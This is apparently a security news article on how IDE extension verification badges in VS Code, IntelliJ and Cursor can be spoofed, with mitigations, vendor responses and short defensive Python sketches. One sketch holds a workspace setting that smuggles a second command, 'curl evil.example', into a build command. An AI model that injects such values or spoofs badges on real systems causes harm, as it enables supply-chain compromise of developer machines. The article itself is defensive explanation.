Misplaced Trust and IDE Verification Badges

Security researchers conducted an in-depth investigation during May and June 2025 into how major IDEs handle extension verification. The study focused on Visual Studio Code, Visual Studio, IntelliJ IDEA, and Cursor. Their findings revealed that verification badges cannot be trusted and that the problem is systemic: malicious extensions can retain the “verified” badge and appear trustworthy even while executing unauthorized OS‑level commands.

Verification Systems Bypassed

Their method began by analyzing how IDEs verify extension publisher and identity information. Researchers observed that IDE clients send specific requests to marketplace servers, and the resulting verification tokens are stored inside the extension package.

By reverse‑engineering this mechanism, attackers can craft a malicious VSIX or plugin that carries the same verification token, publisher ID, and extension metadata as a legitimate verified extension. This spoofed package inherits the badge while embedding harmful functionality, such as shell commands or backdoor triggers, without altering its outward appearance.
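The class of flaw can be illustrated with a deliberately simplified sketch. This is a toy model, not the actual marketplace protocol: it assumes a naive client that trusts verification fields shipped inside the package itself, which is exactly what makes copied metadata sufficient to carry the badge along.

```python
def naive_is_verified(manifest: dict) -> bool:
    # Naive check: trust the verification fields embedded in the package
    # metadata itself, instead of validating a signature over the contents.
    return (manifest.get("publisher") == "trusted-publisher"
            and manifest.get("verified") is True)

# A legitimate package and a malicious one that simply copied its metadata.
legit = {"name": "good-ext", "publisher": "trusted-publisher", "verified": True}
spoofed = {"name": "evil-ext", "publisher": "trusted-publisher", "verified": True}

print(naive_is_verified(legit))    # True
print(naive_is_verified(spoofed))  # True: the copied metadata passes the same check
```

Because nothing cryptographically binds the verification claim to the package contents, the check cannot distinguish the spoofed package from the original.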

Notably, even after notifying Microsoft, JetBrains, and Cursor, security researchers found the exploit remained effective as late as June 29, 2025. Microsoft reportedly classified the risk as “by design,” asserting that the vulnerability did not meet its criteria for immediate remediation. Developers dismissing a flaw as “a feature, not a bug” is meme‑worthy, but when that “feature” enables supply chain attacks, the excuse wears thin and the vulnerability should be patched.

Real‑World Risks to Developer Workstations and Supply Chains

Because IDE extensions run with the same privileges as the user, often with full access to files, network, and shell, the implications are severe:

  • Extensions can read or modify source code, deployment credentials, SSH keys, or environment configurations.
  • They can silently exfiltrate data or plant backdoors.
  • Poisoned extensions may infect internal code repositories, compounding supply chain damage.

Developers frequently trust the “verified” badge as a cue of safety, yet the research demonstrates that the badge is compromised as an indicator of reliability. This vulnerability is especially concerning for developers within high‑risk or regulated environments, where unchecked extensions can circumvent strict security policies and enable lateral movement.

Extension Integrity has Been Questioned in the Past

The exploitation is not limited to verification spoofing; academic work such as the UntrustIDE study has raised similar concerns. Among the 25,000+ extensions analyzed in early 2023, 21 had confirmed proof‑of‑concept code injection vulnerabilities, impacting over six million installations. Many extensions imported third-party dependencies and lacked sufficient validation of manifest settings, workspace configuration, or network content.

UntrustIDE research mapped four possible taint sources (workspace settings, project files, network responses, and external configurations) and three dangerous sinks (shell commands, eval(), and arbitrary file writes). The lack of sandboxing in VSCode and similar IDEs magnifies this threat significantly.
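The source-to-sink pattern is language-agnostic. The sketch below uses Python in place of an extension's JavaScript, with an assumed workspace setting name, to show how attacker-controlled configuration (a taint source) reaches a shell-command sink unless it is validated first.

```python
import json

# Taint source: a workspace configuration file an extension might read.
# The setting name "build.command" is illustrative, not a real VSCode key.
workspace_settings = json.loads('{"build.command": "echo pwned; curl evil.example"}')
cmd = workspace_settings["build.command"]

# Dangerous sink (shown commented out): shell=True would execute the
# attacker-controlled string verbatim.
# subprocess.run(cmd, shell=True)   # vulnerable pattern

# Mitigation: validate the program against an allowlist before executing.
ALLOWED_PROGRAMS = {"make", "npm"}
program = cmd.split()[0]
is_safe = program in ALLOWED_PROGRAMS
print(is_safe)  # False: the tainted command is rejected, not executed
```

The point is that the sink is only dangerous when untrusted input can reach it; cutting the taint path with validation is cheaper than sandboxing the whole IDE.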

Mitigation Strategies and Security Best Practices

Several mitigation strategies and best practices have been issued:

  1. Do not rely solely on verification badges as indicators of trust.
  2. Embed cryptographic per-file hashes and publisher certificates directly in extension packages, not just metadata fields.
  3. Use signed manifests and enforce signature checks at install and runtime even for local sideloaded extensions.
  4. Adopt multifactor extension signing and verification processes that resist token spoofing.
  5. Implement DevSecOps pipelines that vet third‑party extensions, include static and dynamic analysis, and monitor anomalous behavior at runtime.
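Point 2 above can be sketched concretely. This is a minimal illustration of per-file hash manifests, not any vendor's actual packaging format: it records a SHA-256 digest for every file in a package and detects any post-verification tampering.

```python
import hashlib
import tempfile
from pathlib import Path

def build_hash_manifest(root: Path) -> dict:
    # Record a SHA-256 digest for every file in the extension package.
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }

def verify_package(root: Path, manifest: dict) -> bool:
    # Recompute digests and compare against the (presumed signed) manifest.
    return build_hash_manifest(root) == manifest

# Demo with a throwaway "extension" directory.
with tempfile.TemporaryDirectory() as d:
    root = Path(d)
    (root / "extension.js").write_text("console.log('hi');")
    manifest = build_hash_manifest(root)
    ok_before = verify_package(root, manifest)          # untampered: matches
    (root / "extension.js").write_text("malicious();")  # simulate tampering
    ok_after = verify_package(root, manifest)           # digest mismatch
    print(ok_before, ok_after)  # True False
```

In a real deployment the manifest itself would be covered by a publisher signature, so an attacker could not simply regenerate it after modifying files.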

From an organizational perspective, it is advised:

  • Restrict extension installation to curated internal sources.
  • Block sideloading by default or enforce override controls.
  • Vet all extensions via static analysis tools such as CodeQL that target extension-specific taint paths.
  • Conduct runtime monitoring to detect unusual OS calls or network activity originating from IDEs.
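The first of these controls, restricting installs to curated sources, can be enforced with a simple audit. The sketch below assumes a hypothetical allowlist of approved extension IDs (the IDs shown are illustrative); it flags anything installed outside the curated set.

```python
# Hypothetical curated allowlist of approved extension IDs (illustrative values).
ALLOWLIST = {"ms-python.python", "dbaeumer.vscode-eslint"}

def audit_installed(installed: list[str]) -> list[str]:
    # Return installed extensions that are not on the curated allowlist.
    return [ext for ext in installed if ext not in ALLOWLIST]

violations = audit_installed(["ms-python.python", "acme.sideloaded-ext"])
print(violations)  # ['acme.sideloaded-ext']
```

Run periodically against each workstation's installed-extension list, this turns the organizational policy into a checkable control rather than a guideline.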

For those securing development environments, the key takeaway is clear: badges alone offer false assurance. Threat actors can mimic publisher identity and badge metadata while executing malicious payloads.

Teams should audit any use of trusted extensions, especially those installed outside official marketplaces. They must enforce technical controls to ensure all installed packages, whether from marketplace or sideloaded, are truly verified, not simply visually labeled.

As part of broader software supply chain assurance, verifying extension integrity, even for developer tools, is non-negotiable. Attackers can exploit trusted workflows, seed compromised code through developer workstations, and penetrate deeper than a typical phishing attack could.

Underwhelming Vendor Reactions

Despite the attention, responses from IDE vendors have lacked urgency:

  • Microsoft asserted that default signature verification prevents marketplace publishing of spoofed extensions—but acknowledged sideloading remains vulnerable. They insisted changes are not critical.
  • JetBrains treated sideloaded IntelliJ plugins as explicitly flagged third‑party extensions, thus relying on UI warnings rather than eliminating the flaw.
  • Cursor reportedly does not enforce any signature verification at all, leaving the ecosystem open.

Their responses have been criticized for illustrating a gap between understanding the technical risk and enacting timely security updates.

The Trust Gap Widened

Research from both security firms and academics reveals a critical trust gap in how modern IDE platforms verify extensions. Malicious actors can manipulate verified symbols and metadata to bypass trust controls and execute arbitrary code on developer machines. Vendor responses to date have been tepid, leaving the risk active as of late June 2025.

Security teams must respond proactively. They should embed cryptographic integrity checks, forbid sideloading by default, apply taint‑aware static analysis, and treat extension trust badges with skepticism. The developer environment is part of the attack surface, and protecting it demands rigor equal to the rest of the software supply chain.
